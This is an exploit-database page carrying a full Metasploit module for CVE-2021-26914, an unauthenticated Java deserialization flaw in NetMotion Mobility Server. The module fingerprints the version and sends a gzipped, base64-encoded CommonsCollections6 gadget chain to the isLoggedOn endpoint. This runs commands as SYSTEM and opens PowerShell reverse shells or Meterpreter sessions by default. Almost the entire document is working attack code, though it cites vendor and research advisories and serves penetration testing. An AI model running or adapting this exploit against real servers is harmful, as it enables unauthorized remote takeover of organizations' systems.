Exploit for NetMotion Mobility Server MvcUtil Java Deserialization CVE-2021-26914

Name: Exploit for NetMotion Mobility Server MvcUtil Java Deserialization CVE-2021-26914
Rating: 5 (203 reviews)
2021-05-18 | CVSS 9.3
## https://sploitus.com/exploit?id=PACKETSTORM:162617
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::JavaDeserialization  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Powershell  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',  
'Description' => %q{  
This module exploits an unauthenticated Java deserialization in the  
NetMotion Mobility server's MvcUtil.valueStringToObject() method, as  
invoked through the /mobility/Menu/isLoggedOn endpoint, to execute  
code as the SYSTEM account.  
  
Mobility server versions 11.x before 11.73 and 12.x before 12.02 are  
vulnerable. Tested against 12.01.09045 on Windows Server 2016.  
},  
'Author' => [  
'mr_me', # Discovery and PoC  
'wvu' # Module  
],  
'References' => [  
['CVE', '2021-26914'],  
['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],  
['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],  
['URL', 'https://srcincite.io/advisories/src-2021-0007/']  
],  
'DisclosureDate' => '2021-02-08', # Public disclosure  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Privileged' => true,  
'Targets' => [  
[  
'Command',  
{  
'Arch' => ARCH_CMD,  
'Type' => :cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'  
}  
}  
],  
[  
'Dropper',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :dropper,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'  
}  
}  
],  
[  
'PowerShell',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :psh,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'  
}  
}  
]  
],  
'DefaultTarget' => 2,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [  
IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs  
ARTIFACTS_ON_DISK # CmdStager  
]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path)  
)  
  
unless (version = parse_version(res))  
return CheckCode::Unknown('Failed to parse version from response.')  
end  
  
unless vuln_version?(version)  
return CheckCode::Safe("NetMotion Mobility #{version} is patched.")  
end  
  
CheckCode::Appears("NetMotion Mobility #{version} is unpatched.")  
end  
  
def parse_version(res)  
return unless res&.code == 200  
  
# <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>  
res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[  
%r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$},  
:version # Hat tip @adfoster-r7  
]  
end  
  
def vuln_version?(version)  
@vuln_versions ||=  
(11.0...11.73).step(0.01) + # 11.0 through 11.72  
(12.0...12.02).step(0.01) # 12.0 through 12.01  
  
@vuln_versions.include?(version.to_f)  
end  
  
def exploit  
print_status("Executing #{payload_instance.refname} (#{target.name})")  
  
case target['Type']  
when :cmd  
execute_command(payload.encoded)  
when :dropper  
execute_cmdstager  
when :psh  
execute_command(  
cmd_psh_payload(  
payload.encoded,  
payload.arch.first,  
remove_comspec: true  
)  
)  
end  
end  
  
def execute_command(cmd, _opts = {})  
# XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server  
cmd.prepend(  
'set Path=%Path%;' \  
'C:\Windows\System32' \  
';' \  
'C:\Windows\System32\WindowsPowerShell\v1.0' \  
'&&'  
)  
  
print_status('Triggering deserialization')  
vprint_status("Executing command: #{cmd}")  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),  
'vars_post' => {  
'Mvc_x_Form_x_Name' => go_go_gadget(cmd)  
}  
)  
  
unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing  
fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')  
end  
  
print_good('Successfully triggered deserialization')  
end  
  
def go_go_gadget(cmd)  
Rex::Text.encode_base64(  
Rex::Text.gzip(  
generate_java_deserialization_for_command(  
'CommonsCollections6',  
'cmd', # cmd.exe  
cmd  
)  
)  
)  
end  
  
end